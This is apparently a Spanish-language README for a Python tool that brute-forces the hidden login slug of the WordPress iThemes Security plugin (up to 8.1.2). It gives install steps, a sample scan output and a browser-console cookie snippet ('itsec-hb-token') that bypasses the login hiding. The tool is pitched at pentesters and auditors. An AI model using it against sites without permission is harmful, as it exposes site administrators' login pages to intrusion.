Herramienta de detección y explotación de slugs ocultos generados por el plugin iThemes Security en instalaciones WordPress mal configuradas o desactualizadas.
⚠️ Basada en la vulnerabilidad documentada en:
WPScan Advisory - iThemes Security <= 8.1.2
Bypass_iThemesSecurity automatiza la detección de tokens (slugs) ocultos usados por iThemes Security para mover el acceso al panel de login de WordPress (wp-login.php). Si el sitio está desactualizado o mal configurado, esta herramienta puede encontrar ese slug y permitir el bypass completo del ocultamiento.
- Red Teams y Pentesters que necesiten evadir plugins de ocultamiento de login.
- Auditores de seguridad en entornos WordPress.
- Investigadores de seguridad interesados en fingerprinting de instalaciones WordPress.
- Cazadores de bugs que validan configuraciones erróneas.
- Python 3.7+
- Librerías:
requestsbeautifulsoup4richpyfiglet
git clone https://github.com/AndreewNR/Bypass_IthemeSecurity.git
cd Bypass_iThemesSecuritypip install -r requirements.txtEjecuta la herramienta con:
python main.py[+] Ingresa la URL objetivo (sin / al final): https://tudominio.com
🔍 Iniciando escaneo de slugs ocultos en: https://tudominio.com
🔄 Probando slug: 6bcbbd3fc2 🔄 Probando slug: loginadmin 🔄 Probando slug: abc123...
✅ ¡Bypass exitoso! Slug válido: loginadmin 🔗 Accede directamente: https://tudominio.com/wp-login.php
Puedes simular el bypass en el navegador usando cookies. Si la herramienta detecta un slug válido y entrega cookies, puedes abrir la consola de tu navegador (F12) y ejecutar:
document.cookie = "itsec-hb-token=loginadmin";
window.location.href = "/wp-login.php";Esta herramienta es solo para fines educativos y auditorías autorizadas.
El uso no ético o en sistemas sin permiso explícito podría violar leyes locales.
Autores y colaboradores no se hacen responsables del uso indebido de este software.